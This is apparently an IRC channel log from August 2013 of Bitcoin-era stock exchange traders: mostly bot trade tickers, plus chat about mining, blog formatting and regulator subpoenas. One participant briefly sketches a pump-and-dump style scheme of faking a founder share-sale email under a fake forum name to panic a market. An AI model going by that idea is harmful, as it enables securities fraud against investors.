[LABCOIN] 25 @ 0.001534 = 0.0384 BTC [-] Aug 14 18:11:29 "heat syncs" Aug 14 18:11:42 lol Aug 14 18:11:43 still a major improvement to those cad pictures ;) Aug 14 18:11:52 that obama shit is fucking outrageous. Aug 14 18:12:00 heat must be synchronized Aug 14 18:12:02 it really is Aug 14 18:12:03 i had a link earlier about sueing some rodeo clown Aug 14 18:12:09 [BTCTC] [LABCOIN] 25 @ 0.001534 = 0.0384 BTC [-] Aug 14 18:12:25 [MPEX] [S.MPOE] 1948 @ 0.00083482 = 1.6262 BTC [-] Aug 14 18:12:27 [MPEX] [S.MPOE] 18302 @ 0.00083115 = 15.2117 BTC [-] Aug 14 18:12:58 [HAVELOCK] [XBOND] 28 @ 0.0010452 = 0.0293 BTC [-] Aug 14 18:13:09 Hollywood you gotta put better insulation between you and what you quote Aug 14 18:13:16 people will end up associating you with knc/etc Aug 14 18:13:37 [BTCTC] [DMS.PURCHASE] 390 @ 0.028 = 10.92 BTC [+] Aug 14 18:13:50 the formatting on your quoted content is a but hard to distinguish Aug 14 18:13:56 from actual content Aug 14 18:13:59 oh yeah, good point- thank you Aug 14 18:14:10 [BTCTC] [LABCOIN] 25 @ 0.001534 = 0.0384 BTC [-] Aug 14 18:14:14 yeah, I do not want that Aug 14 18:15:22 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [+] Aug 14 18:16:08 [BTCTC] [BASIC-MINING] 1 @ 0.3101 BTC [-] Aug 14 18:16:09 [BTCTC] [BASIC-MINING] 5 @ 0.31 = 1.55 BTC [-] Aug 14 18:16:11 [BTCTC] [BASIC-MINING] 4 @ 0.3001 = 1.2004 BTC [-] Aug 14 18:16:12 [BTCTC] [BASIC-MINING] 1 @ 0.3001 BTC [-] Aug 14 18:16:13 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:13 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:14 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:15 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:16 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:17 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:19 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:20 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:21 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:22 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 14 18:16:23 [BTCTC] [BASIC-MINING] 2 @ 0.2993 = 0.5986 BTC [-] Aug 14 18:16:23 [BTCTC] [BASIC-MINING] 10 @ 0.2992 = 2.992 BTC [-] Aug 14 18:16:24 [BTCTC] [BASIC-MINING] 3 @ 0.2991 = 0.8973 BTC [-] Aug 14 18:16:25 [BTCTC] [BASIC-MINING] 1 @ 0.299 BTC [-] Aug 14 18:16:26 [BTCTC] [BASIC-MINING] 3 @ 0.299 = 0.897 BTC [-] Aug 14 18:17:28 [BTCTC] [LABCOIN] 400 @ 0.001535 = 0.614 BTC [+] Aug 14 18:17:29 [BTCTC] [LABCOIN] 475 @ 0.001534 = 0.7287 BTC [-] Aug 14 18:17:30 [BTCTC] [LABCOIN] 28 @ 0.001532 = 0.0429 BTC [-] Aug 14 18:17:31 [BTCTC] [LABCOIN] 97 @ 0.001531 = 0.1485 BTC [-] Aug 14 18:17:49 [BTCTC] [BFMINES] 15 @ 0.00165 = 0.0248 BTC [+] Aug 14 18:17:52 [BTCTC] [DMS.MINING] 11 @ 0.0032 = 0.0352 BTC [-] Aug 14 18:17:54 [BTCTC] [DMS.MINING] 100 @ 0.00318 = 0.318 BTC [-] Aug 14 18:17:54 [BTCTC] [DMS.MINING] 10 @ 0.003173 = 0.0317 BTC [-] Aug 14 18:17:55 [BTCTC] [DMS.MINING] 473 @ 0.003162 = 1.4956 BTC [-] Aug 14 18:17:56 [BTCTC] [DMS.MINING] 29 @ 0.003161 = 0.0917 BTC [-] Aug 14 18:17:58 [BTCTC] [DMS.MINING] 10 @ 0.003158 = 0.0316 BTC [-] Aug 14 18:17:59 [BTCTC] [DMS.MINING] 4 @ 0.003152 = 0.0126 BTC [-] Aug 14 18:18:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.04096 = 0.1638 BTC [+] Aug 14 18:19:35 [BTCTC] [COGNITIVE] 1 @ 0.379 BTC [-] Aug 14 18:19:36 [BTCTC] [COGNITIVE] 1 @ 0.378 BTC [-] Aug 14 18:19:38 [BTCTC] [COGNITIVE] 3 @ 0.3772 = 1.1316 BTC [-] Aug 14 18:19:39 [BTCTC] [COGNITIVE] 3 @ 0.365 = 1.095 BTC [-] Aug 14 18:19:40 [BTCTC] [COGNITIVE] 4 @ 0.3461 = 1.3844 BTC [-] Aug 14 18:19:40 [BTCTC] [COGNITIVE] 5 @ 0.346 = 1.73 BTC [-] Aug 14 18:19:42 [BTCTC] [COGNITIVE] 11 @ 0.341 = 3.751 BTC [-] Aug 14 18:19:43 [BTCTC] [COGNITIVE] 20 @ 0.3252 = 6.504 BTC [-] Aug 14 18:19:44 [BTCTC] [COGNITIVE] 16 @ 0.321 = 5.136 BTC [-] Aug 14 18:19:45 [BTCTC] [COGNITIVE] 9 @ 0.3205 = 2.8845 BTC [-] Aug 14 18:19:46 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [-] Aug 14 18:19:47 [BTCTC] [COGNITIVE] 11 @ 0.3125 = 3.4375 BTC [-] Aug 14 18:19:48 [BTCTC] [COGNITIVE] 2 @ 0.3121 = 0.6242 BTC [-] Aug 14 18:19:49 [BTCTC] [COGNITIVE] 28 @ 0.312 = 8.736 BTC [-] Aug 14 18:24:52 [HAVELOCK] [XBOND] 48 @ 0.0010452 = 0.0502 BTC [-] Aug 14 18:25:44 [BTCTC] [BASIC-MINING] 1 @ 0.32 BTC [+] Aug 14 18:25:48 [MPEX] [S.MPOE] 4150 @ 0.00083613 = 3.4699 BTC [+] Aug 14 18:25:49 [MPEX] [S.MPOE] 2723 @ 0.00083788 = 2.2815 BTC [+] Aug 14 18:25:50 amir finally without hoodie (russian content): Aug 14 18:25:50 [MPEX] [S.MPOE] 9300 @ 0.00084031 = 7.8149 BTC [+] Aug 14 18:25:52 http://www.youtube.com/watch?v=8vLQi39ObOs&feature=youtu.be Aug 14 18:26:00 [MPEX] [S.MPOE] 2000 @ 0.00084064 = 1.6813 BTC [+] Aug 14 18:26:46 [BTCTC] [BASIC-MINING] 1 @ 0.32 BTC [+] Aug 14 18:28:07 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [+] Aug 14 18:28:10 [BTCTC] [ASICMINER-PT] 4 @ 4.077 = 16.308 BTC [+] Aug 14 18:28:45 though there's holes in his shirt Aug 14 18:29:44 holes add culture Aug 14 18:30:13 cheesy pun! Aug 14 18:30:29 mmmm make me a sandwich! Aug 14 18:30:38 He always looks like he's been dipped in a vat of grease. Aug 14 18:30:50 not everyone like to bathe every day Aug 14 18:30:56 give the guy a break gah Aug 14 18:31:25 tv makes you looked bathed plus it adds 10 lbs Aug 14 18:31:39 [HAVELOCK] [AM100] 2 @ 0.0387 = 0.0774 BTC [+] Aug 14 18:32:02 [BTCTC] [DMS.SELLING] 9 @ 0.0251 = 0.2259 BTC [+] Aug 14 18:32:32 mircea and Tat, see if that looks better Aug 14 18:32:59 [BTCTC] [LABCOIN] 2 @ 0.001575 = 0.0032 BTC [+] Aug 14 18:33:00 [BTCTC] [LABCOIN] 20 @ 0.001576 = 0.0315 BTC [+] Aug 14 18:33:02 [BTCTC] [LABCOIN] 11 @ 0.001579 = 0.0174 BTC [+] Aug 14 18:33:02 [BTCTC] [LABCOIN] 88 @ 0.00158 = 0.139 BTC [+] Aug 14 18:33:04 [BTCTC] [LABCOIN] 14 @ 0.001587 = 0.0222 BTC [+] Aug 14 18:33:05 [BTCTC] [LABCOIN] 100 @ 0.001588 = 0.1588 BTC [+] Aug 14 18:33:06 [BTCTC] [LABCOIN] 100 @ 0.001589 = 0.1589 BTC [+] Aug 14 18:33:07 [BTCTC] [LABCOIN] 1 @ 0.001589 BTC [+] Aug 14 18:33:08 [BTCTC] [LABCOIN] 85 @ 0.001589 = 0.1351 BTC [+] Aug 14 18:33:09 [BTCTC] [LABCOIN] 283 @ 0.00159 = 0.45 BTC [+] Aug 14 18:33:10 [BTCTC] [LABCOIN] 400 @ 0.00159 = 0.636 BTC [+] Aug 14 18:33:11 [BTCTC] [LABCOIN] 187 @ 0.001594 = 0.2981 BTC [+] Aug 14 18:33:12 [BTCTC] [LABCOIN] 500 @ 0.001595 = 0.7975 BTC [+] Aug 14 18:33:14 [BTCTC] [LABCOIN] 1000 @ 0.001596 = 1.596 BTC [+] Aug 14 18:33:14 [BTCTC] [LABCOIN] 500 @ 0.001598 = 0.799 BTC [+] Aug 14 18:33:15 [BTCTC] [LABCOIN] 3000 @ 0.001599 = 4.797 BTC [+] Aug 14 18:33:16 [BTCTC] [LABCOIN] 1000 @ 0.0016 = 1.6 BTC [+] Aug 14 18:33:17 [BTCTC] [LABCOIN] 187 @ 0.001609 = 0.3009 BTC [+] Aug 14 18:33:18 [BTCTC] [LABCOIN] 1500 @ 0.00161 = 2.415 BTC [+] Aug 14 18:33:19 [BTCTC] [LABCOIN] 20 @ 0.001624 = 0.0325 BTC [+] Aug 14 18:33:20 [BTCTC] [LABCOIN] 166 @ 0.001625 = 0.2698 BTC [+] Aug 14 18:33:21 [BTCTC] [LABCOIN] 6 @ 0.001639 = 0.0098 BTC [+] Aug 14 18:33:22 [BTCTC] [LABCOIN] 5 @ 0.00164 = 0.0082 BTC [+] Aug 14 18:33:23 [BTCTC] [LABCOIN] 1 @ 0.00164 BTC [+] Aug 14 18:33:24 [BTCTC] [LABCOIN] 1 @ 0.00164 BTC [+] Aug 14 18:33:24 [BTCTC] [LABCOIN] 45 @ 0.00164 = 0.0738 BTC [+] Aug 14 18:33:25 [BTCTC] [LABCOIN] 145 @ 0.001643 = 0.2382 BTC [+] Aug 14 18:33:26 [BTCTC] [LABCOIN] 50 @ 0.001644 = 0.0822 BTC [+] Aug 14 18:33:27 [BTCTC] [LABCOIN] 210 @ 0.001644 = 0.3452 BTC [+] Aug 14 18:33:28 [BTCTC] [LABCOIN] 905 @ 0.001645 = 1.4887 BTC [+] Aug 14 18:33:29 [BTCTC] [LABCOIN] 143 @ 0.001649 = 0.2358 BTC [+] Aug 14 18:33:30 [BTCTC] [LABCOIN] 50 @ 0.00165 = 0.0825 BTC [+] Aug 14 18:33:31 [BTCTC] [LABCOIN] 1100 @ 0.00165 = 1.815 BTC [+] Aug 14 18:33:32 [BTCTC] [LABCOIN] 7 @ 0.001661 = 0.0116 BTC [+] Aug 14 18:33:33 [BTCTC] [LABCOIN] 60 @ 0.001662 = 0.0997 BTC [+] Aug 14 18:33:33 [BTCTC] [LABCOIN] 100 @ 0.001674 = 0.1674 BTC [+] Aug 14 18:33:34 [BTCTC] [LABCOIN] 806 @ 0.001675 = 1.3501 BTC [+] Aug 14 18:33:35 [BTCTC] [LABCOIN] 63 @ 0.001677 = 0.1057 BTC [+] Aug 14 18:33:36 [BTCTC] [LABCOIN] 5 @ 0.001678 = 0.0084 BTC [+] Aug 14 18:33:37 [BTCTC] [LABCOIN] 500 @ 0.001678 = 0.839 BTC [+] Aug 14 18:33:37 brb selling laboin lol Aug 14 18:33:38 [BTCTC] [LABCOIN] 62 @ 0.001679 = 0.1041 BTC [+] Aug 14 18:33:39 [BTCTC] [LABCOIN] 500 @ 0.00168 = 0.84 BTC [+] Aug 14 18:33:40 [BTCTC] [LABCOIN] 175 @ 0.001688 = 0.2954 BTC [+] Aug 14 18:33:41 [BTCTC] [LABCOIN] 1400 @ 0.001689 = 2.3646 BTC [+] Aug 14 18:33:42 [BTCTC] [LABCOIN] 6 @ 0.00169 = 0.0101 BTC [+] Aug 14 18:33:43 [BTCTC] [LABCOIN] 50 @ 0.001691 = 0.0846 BTC [+] Aug 14 18:33:44 [BTCTC] [LABCOIN] 50 @ 0.001696 = 0.0848 BTC [+] Aug 14 18:33:45 [BTCTC] [LABCOIN] 400 @ 0.001697 = 0.6788 BTC [+] Aug 14 18:33:46 [BTCTC] [LABCOIN] 2643 @ 0.001698 = 4.4878 BTC [+] Aug 14 18:33:47 [BTCTC] [LABCOIN] 1000 @ 0.001699 = 1.699 BTC [+] Aug 14 18:33:48 [BTCTC] [LABCOIN] 8000 @ 0.001699 = 13.592 BTC [+] Aug 14 18:33:49 [BTCTC] [LABCOIN] 50 @ 0.0017 = 0.085 BTC [+] Aug 14 18:33:50 [BTCTC] [LABCOIN] 96 @ 0.0017 = 0.1632 BTC [+] Aug 14 18:33:51 [BTCTC] [LABCOIN] 7202 @ 0.0017 = 12.2434 BTC [+] Aug 14 18:34:09 if i may.. it does, but stating the source one time is enough and i'd but it above, because the reader reads top-down Aug 14 18:34:26 [BTCTC] [LABCOIN] 602 @ 0.001698 = 1.0222 BTC [-] Aug 14 18:34:27 ok, thanks dexX7 Aug 14 18:34:27 [BTCTC] [LABCOIN] 20 @ 0.001699 = 0.034 BTC [+] Aug 14 18:34:28 [BTCTC] [LABCOIN] 378 @ 0.0017 = 0.6426 BTC [+] Aug 14 18:35:38 a link to the source would be nice Aug 14 18:36:08 formatting works, link to source is also a good diea Aug 14 18:36:23 Hollywood i don't see a difference. add a special background like forums do or a bar on the left or something Aug 14 18:36:26 because basically you annoucne pictures, present some text, but the reader would have to search for the pictures himself Aug 14 18:36:52 o do i have a stale page ? 1sec Aug 14 18:36:57 yes much vbetter. Aug 14 18:37:08 omg click refresh already Aug 14 18:37:11 ok, thanks will make those changes also Aug 14 18:37:27 jcpham not everyone likes to click refresh every day gah ? Aug 14 18:37:50 click the things Aug 14 18:38:29 ok, I linked the proper page from knc Aug 14 18:38:46 [HAVELOCK] [AM100] 7 @ 0.0387999 = 0.2716 BTC [+] Aug 14 18:38:48 [BTCTC] [LABCOIN] 10 @ 0.001699 = 0.017 BTC [-] Aug 14 18:38:51 yeah mining is worthwhile Aug 14 18:39:01 next diff change is 10 days away right now Aug 14 18:39:09 probably sooner Aug 14 18:39:10 jcpham someone should make a clickminer. Aug 14 18:39:28 write up the business plan and i'll ipo click.miner Aug 14 18:39:49 ThickAsThieves can server as CTO Aug 14 18:39:53 *serve Aug 14 18:40:46 everyone in the us is going to jail anyways Aug 14 18:41:25 i'm gettin on irc from jail one day and asking for bail money Aug 14 18:41:28 on my bucket list Aug 14 18:41:36 lol Aug 14 18:41:52 "hey dad ? i;m in jale" Aug 14 18:42:02 i like it here, it's great! Aug 14 18:42:05 hahaha Aug 14 18:43:36 i'm shocked about those actm guys (no offense, if you are one of them) ... someone posts legit news combined with some demotivational phrases and now this is considered as "ripping people off, because he fueled panic" >_<# Aug 14 18:44:14 [BTCTC] [ASICMINER-PT] 1 @ 4.077 BTC [+] Aug 14 18:44:16 [MPEX] [S.MPOE] 16700 @ 0.00084088 = 14.0427 BTC [+] Aug 14 18:44:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.04096 BTC [+] Aug 14 18:44:43 who? Aug 14 18:45:26 https://bitcointalk.org/index.php?topic=254930.msg2932397#msg2932397 Aug 14 18:45:32 ActiveMining Overview and Speculation Thread Aug 14 18:46:51 weak drama Aug 14 18:47:10 there is much more in these threads Aug 14 18:47:20 no argument there. Aug 14 18:47:47 He does go around to almost every thread to spread it Aug 14 18:47:54 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.000981 = 0.0088 BTC [-] Aug 14 18:48:22 [BTCTC] [DMS.MINING] 2 @ 0.003539 = 0.0071 BTC [+] Aug 14 18:48:42 He does go around to almost every thread to spread it Aug 14 18:48:47 The way he conducts himself, I wouldn't invest in his business at all. Aug 14 18:48:58 it's his opinion and that's okay, but i'm wondering what would happen, if someone really starts a manipulation campaign Aug 14 18:49:25 They could make a huge profit off of doing such Aug 14 18:49:30 yep Aug 14 18:50:28 Make up a fake forum name, fake some email about selling off shares from founding members of ipo (take labcoin for example), post it. Panic Aug 14 18:51:11 didn't theswede say the other labcoin member will join the forum soon? ;) Aug 14 18:51:13 from a longtime miner: miner is a losing game Aug 14 18:51:20 *mining Aug 14 18:51:32 yep Aug 14 18:51:32 [MPEX] [S.MPOE] 212 @ 0.00084215 = 0.1785 BTC [+] Aug 14 18:51:35 [BTCTC] [DMS.MINING] 1 @ 0.00351 BTC [-] Aug 14 18:51:42 any business with the word mining in it immediately is a failure to me Aug 14 18:52:57 https://en.bitcoin.it/wiki/File:Total_bitcoins_over_time_graph.png Aug 14 18:53:03 that chart really tells it Aug 14 18:53:16 2017 is my cutoff Aug 14 18:53:32 [BTCTC] [ACTIVEMINING] 30 @ 0.005391 = 0.1617 BTC [-] Aug 14 18:53:33 [BTCTC] [ACTIVEMINING] 20 @ 0.00539 = 0.1078 BTC [-] Aug 14 18:53:34 [BTCTC] [ACTIVEMINING] 42 @ 0.005389 = 0.2263 BTC [-] Aug 14 18:53:35 [BTCTC] [ACTIVEMINING] 433 @ 0.005388 = 2.333 BTC [-] Aug 14 18:54:25 Yahoo has a new logo? Aug 14 18:54:27 meh Aug 14 18:54:33 looks too much like Yoohoo Aug 14 18:54:45 [BTCTC] [DMS.SELLING] 77 @ 0.0251 = 1.9327 BTC [+] Aug 14 18:54:58 heh Aug 14 18:55:34 [BTCTC] [DMS.SELLING] 35 @ 0.02527 = 0.8845 BTC [+] Aug 14 18:57:02 yahoo is perhaps the worst brand name in the history of brand names Aug 14 18:57:07 until someone comes up with like... Belch Aug 14 18:57:45 [BTCTC] [TAT.ASICMINER] 25 @ 0.04096 = 1.024 BTC [+] Aug 14 19:00:19 jcpham i've been thinking that since ~2011. Aug 14 19:00:21 [BTCTC] [ACTIVEMINING] 56 @ 0.005399 = 0.3023 BTC [+] Aug 14 19:00:23 [BTCTC] [ACTIVEMINING] 850 @ 0.0054 = 4.59 BTC [+] Aug 14 19:01:08 Is there a way to setup a read-only GPG key, that can just get MPEX account balances and whatnot, without being able to execute trades or transfers? Aug 14 19:01:15 [BTCTC] [DMS.SELLING] 17 @ 0.02527 = 0.4296 BTC [+] Aug 14 19:01:17 [BTCTC] [DMS.SELLING] 2 @ 0.02528 = 0.0506 BTC [+] Aug 14 19:01:43 mircea_popescu ^ Aug 14 19:02:24 yes. you write a snippet of perl/python that does that, signs it and pushes it ot its destination. Aug 14 19:02:27 [BTCTC] [DMS.SELLING] 339 @ 0.023 = 7.797 BTC [-] Aug 14 19:02:53 [BTCTC] [ASICMINER-PT] 1 @ 4.077 BTC [+] Aug 14 19:04:47 or you arrange to prepare a bunch of encrypted/signed STATs from airgapped machine Aug 14 19:06:13 [BTCTC] [ASICMINER-PT] 2 @ 4.077 = 8.154 BTC [+] Aug 14 19:06:26 [BTCTC] [DMS.MINING] 13 @ 0.003489 = 0.0454 BTC [-] Aug 14 19:08:05 this is true. you could sign 10k STATs, encrypt them with MPEx's keuy and publish them on an as-needed basis Aug 14 19:10:27 [MPEX] [S.MPOE] 13300 @ 0.00084231 = 11.2027 BTC [+] Aug 14 19:10:33 [BTCTC] [LABCOIN] 128 @ 0.001583 = 0.2026 BTC [-] Aug 14 19:12:53 thx Aug 14 19:13:32 [HAVELOCK] [SDSTM] 1 @ 0.0061 BTC [+] Aug 14 19:13:57 [BTCTC] [DMS.SELLING] 61 @ 0.019 = 1.159 BTC [-] Aug 14 19:14:42 [BTCTC] [DMS.SELLING] 250 @ 0.0198 = 4.95 BTC [+] Aug 14 19:15:38 [BTCTC] [DMS.SELLING] 14 @ 0.01899 = 0.2659 BTC [-] Aug 14 19:16:18 [BTCTC] [DMS.SELLING] 210 @ 0.0188 = 3.948 BTC [-] Aug 14 19:16:38 gogo 115 so close Aug 14 19:16:53 bah Aug 14 19:16:54 still... you need your private key to decrypt reply from mpex, too Aug 14 19:17:03 [BTCTC] [DMS.PURCHASE] 1001 @ 0.02079 = 20.8108 BTC [-] Aug 14 19:17:36 [BTCTC] [DMS.PURCHASE] 500 @ 0.02079 = 10.395 BTC [-] Aug 14 19:18:32 [BTCTC] [DMS.SELLING] 12 @ 0.0186 = 0.2232 BTC [-] Aug 14 19:18:50 [BTCTC] [DMS.SELLING] 50 @ 0.0186 = 0.93 BTC [-] Aug 14 19:19:35 [BTCTC] [COGNITIVE] 5 @ 0.3982 = 1.991 BTC [+] Aug 14 19:19:36 [BTCTC] [COGNITIVE] 1 @ 0.3982 BTC [+] Aug 14 19:19:38 [BTCTC] [COGNITIVE] 1 @ 0.3982 BTC [+] Aug 14 19:19:39 [BTCTC] [COGNITIVE] 2 @ 0.399 = 0.798 BTC [+] Aug 14 19:20:09 [BTCTC] [DMS.SELLING] 16 @ 0.0184 = 0.2944 BTC [-] Aug 14 19:20:17 [BTCTC] [DMS.PURCHASE] 6 @ 0.02079 = 0.1247 BTC [-] Aug 14 19:20:31 [BTCTC] [DMS.SELLING] 200 @ 0.01836 = 3.672 BTC [-] Aug 14 19:20:42 115 on mtgox? not impressed. call me when bitstamp goes there Aug 14 19:20:56 or btce Aug 14 19:21:10 ^^^ Aug 14 19:21:12 or coinlab Aug 14 19:21:21 they are trailing along Aug 14 19:21:24 just with a gap Aug 14 19:21:34 wait coinlab uses gox price Aug 14 19:21:39 hehe Aug 14 19:21:46 [BTCTC] [DMS.PURCHASE] 245 @ 0.02079 = 5.0936 BTC [-] Aug 14 19:21:47 yep 115 on gox will hopefully mean 105 on bitstamp Aug 14 19:21:47 ThickAsThieves is a gox price Aug 14 19:22:46 [BTCTC] [DMS.MINING] 1 @ 0.003152 BTC [-] Aug 14 19:23:06 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [-] Aug 14 19:23:34 [BTCTC] [DMS.PURCHASE] 70 @ 0.02079 = 1.4553 BTC [-] Aug 14 19:23:54 [HAVELOCK] [AM100] 10 @ 0.0378 = 0.378 BTC [-] Aug 14 19:23:59 [BTCTC] [DMS.SELLING] 16 @ 0.01704 = 0.2726 BTC [-] Aug 14 19:24:01 [HAVELOCK] [AM100] 15 @ 0.03770001 = 0.5655 BTC [-] Aug 14 19:25:04 [BTCTC] [TAT.ASICMINER] 9 @ 0.04096 = 0.3686 BTC [+] Aug 14 19:25:25 ;;ticker Aug 14 19:25:25 MtGox BTCUSD ticker | Best bid: 114.89000, Best ask: 114.99987, Bid-ask spread: 0.10987, Last trade: 114.89000, 24 hour volume: 51527.43546058, 24 hour low: 106.21000, 24 hour high: 115.00000, 24 hour vwap: 111.65575 Aug 14 19:25:31 wait when did that happen? Aug 14 19:25:42 [BTCTC] [DMS.SELLING] 727 @ 0.01832 = 13.3186 BTC [+] Aug 14 19:26:02 [BTCTC] [DMS.SELLING] 150 @ 0.01833 = 2.7495 BTC [+] Aug 14 19:26:03 [BTCTC] [DMS.SELLING] 84 @ 0.01834 = 1.5406 BTC [+] Aug 14 19:26:17 [BTCTC] [DMS.SELLING] 150 @ 0.01833 = 2.7495 BTC [-] Aug 14 19:26:18 [BTCTC] [DMS.SELLING] 14 @ 0.01832 = 0.2565 BTC [-] Aug 14 19:26:20 hehe Aug 14 19:26:35 [BTCTC] [DMS.PURCHASE] 64 @ 0.02078 = 1.3299 BTC [-] Aug 14 19:26:36 [BTCTC] [DMS.SELLING] 83 @ 0.0181 = 1.5023 BTC [-] Aug 14 19:26:57 [BTCTC] [TAT.ASICMINER] 16 @ 0.04096 = 0.6554 BTC [+] Aug 14 19:27:08 [BTCTC] [RSM] 88 @ 0.0111 = 0.9768 BTC [-] Aug 14 19:27:10 [BTCTC] [RSM] 12 @ 0.011 = 0.132 BTC [-] Aug 14 19:27:12 [BTCTC] [DMS.MINING] 4 @ 0.003151 = 0.0126 BTC [-] Aug 14 19:27:13 [BTCTC] [DMS.MINING] 55 @ 0.00315 = 0.1733 BTC [-] Aug 14 19:27:26 [BTCTC] [DMS.MINING] 20 @ 0.00315 = 0.063 BTC [-] Aug 14 19:27:27 [BTCTC] [DMS.MINING] 40 @ 0.003105 = 0.1242 BTC [-] Aug 14 19:27:28 [BTCTC] [DMS.MINING] 185 @ 0.00302 = 0.5587 BTC [-] Aug 14 19:27:45 [BTCTC] [ACTIVEMINING] 30 @ 0.005389 = 0.1617 BTC [-] Aug 14 19:27:46 [BTCTC] [ACTIVEMINING] 344 @ 0.005388 = 1.8535 BTC [-] Aug 14 19:27:48 [BTCTC] [ACTIVEMINING] 122 @ 0.005382 = 0.6566 BTC [-] Aug 14 19:27:49 [BTCTC] [ACTIVEMINING] 577 @ 0.005381 = 3.1048 BTC [-] Aug 14 19:27:50 [BTCTC] [ACTIVEMINING] 50 @ 0.005381 = 0.2691 BTC [-] Aug 14 19:27:59 [BTCTC] [DMS.SELLING] 37 @ 0.01834 = 0.6786 BTC [+] Aug 14 19:28:00 [BTCTC] [DMS.PURCHASE] 350 @ 0.02078 = 7.273 BTC [-] Aug 14 19:28:11 [BTCTC] [DMS.PURCHASE] 75 @ 0.02078 = 1.5585 BTC [-] Aug 14 19:28:22 [BTCTC] [DMS.MINING] 1 @ 0.00302 BTC [-] Aug 14 19:28:30 [BTCTC] [TAT.ASICMINER] 74 @ 0.04099 = 3.0333 BTC [+] Aug 14 19:28:42 [BTCTC] [DMS.PURCHASE] 75 @ 0.02078 = 1.5585 BTC [-] Aug 14 19:29:01 [BTCTC] [DMS.PURCHASE] 211 @ 0.02078 = 4.3846 BTC [-] Aug 14 19:29:35 [BTCTC] [DMS.PURCHASE] 460 @ 0.02079 = 9.5634 BTC [+] Aug 14 19:29:38 ThickAsThieves: Aug 14 19:29:42 where you at?!?!?!? Aug 14 19:30:04 .d Aug 14 19:30:04 50810339.04828 | Next Diff in 1872 blocks | Estimated Change: 7.7643% in 11d 23h 41m 40s Aug 14 19:30:04 http://www.youtube.com/watch?v=2t15vP1PyoA Aug 14 19:30:06 Grasshopper Divert | Single Cam - YouTube Aug 14 19:30:10 sorry had to land my rocket Aug 14 19:30:13 sup? Aug 14 19:30:17 [BTCTC] [ASICMINER-PT] 2 @ 4.077 = 8.154 BTC [+] Aug 14 19:30:39 [BTCTC] [BASIC-MINING] 1 @ 0.3223 BTC [+] Aug 14 19:30:40 [BTCTC] [DMS.SELLING] 65 @ 0.01829 = 1.1889 BTC [-] Aug 14 19:30:43 [BTCTC] [DMS.SELLING] 245 @ 0.01833 = 4.4909 BTC [+] Aug 14 19:30:45 [BTCTC] [DMS.SELLING] 27 @ 0.01833 = 0.4949 BTC [+] Aug 14 19:31:59 [BTCTC] [DMS.PURCHASE] 200 @ 0.02079 = 4.158 BTC [+] Aug 14 19:32:20 ;;nethash Aug 14 19:32:21 396646.504878 Aug 14 19:33:22 what did the diff end up at yesterday? Aug 14 19:33:35 [HAVELOCK] [AM100] 87 @ 0.0387976 = 3.3754 BTC [+] Aug 14 19:33:43 [BTCTC] [DMS.SELLING] 5 @ 0.0183 = 0.0915 BTC [-] Aug 14 19:33:44 [BTCTC] [DMS.MINING] 14 @ 0.00302 = 0.0423 BTC [-] Aug 14 19:33:46 [BTCTC] [DMS.MINING] 15 @ 0.003011 = 0.0452 BTC [-] Aug 14 19:33:47 50.8m Aug 14 19:33:48 [BTCTC] [DMS.MINING] 50 @ 0.00301 = 0.1505 BTC [-] Aug 14 19:33:49 [BTCTC] [DMS.MINING] 1 @ 0.003 BTC [-] Aug 14 19:33:50 [BTCTC] [DMS.MINING] 16 @ 0.002961 = 0.0474 BTC [-] Aug 14 19:33:51 [BTCTC] [DMS.MINING] 43 @ 0.00296 = 0.1273 BTC [-] Aug 14 19:33:52 [BTCTC] [DMS.MINING] 532 @ 0.002951 = 1.5699 BTC [-] Aug 14 19:33:54 % change, I mean.. Aug 14 19:34:02 35% Aug 14 19:34:08 oh, ok. thx Hollywood Aug 14 19:34:13 np Aug 14 19:35:26 anyone have a final list of those who where subpeonaed? Aug 14 19:35:28 [BTCTC] [DMS.SELLING] 1 @ 0.01819 BTC [-] Aug 14 19:35:30 [MPEX] [S.MPOE] 4800 @ 0.00084231 = 4.0431 BTC [+] Aug 14 19:35:44 [HAVELOCK] [XBOND] 38 @ 0.0010442 = 0.0397 BTC [-] Aug 14 19:36:04 [BTCTC] [DMS.SELLING] 68 @ 0.01819 = 1.2369 BTC [-] Aug 14 19:36:35 it's on reddit etc Aug 14 19:37:14 [BTCTC] [DMS.PURCHASE] 7 @ 0.02079 = 0.1455 BTC [+] Aug 14 19:37:17 [BTCTC] [DMS.SELLING] 9 @ 0.01818 = 0.1636 BTC [-] Aug 14 19:37:37 http://www.forbes.com/sites/kashmirhill/2013/08/12/every-important-person-in-bitcoin-just-got-subpoenaed-by-new-yorks-financial-regulator/ Aug 14 19:37:40 Every Important Person In Bitcoin Just Got Subpoenaed By New York's Financial Regulator - Forbes Aug 14 19:37:40 list there Aug 14 19:37:48 [BTCTC] [DMS.SELLING] 15 @ 0.01818 = 0.2727 BTC [-] Aug 14 19:38:29 [BTCTC] [DMS.SELLING] 100 @ 0.01818 = 1.818 BTC [-] Aug 14 19:39:00 [BTCTC] [DMS.MINING] 30 @ 0.002955 = 0.0887 BTC [+] Aug 14 19:39:11 [BTCTC] [DMS.MINING] 468 @ 0.002951 = 1.3811 BTC [-] Aug 14 19:39:31 [BTCTC] [DMS.MINING] 503 @ 0.00289 = 1.4537 BTC [-] Aug 14 19:39:34 [BTCTC] [DMS.SELLING] 602 @ 0.01817 = 10.9383 BTC [-] Aug 14 19:39:34 [BTCTC] 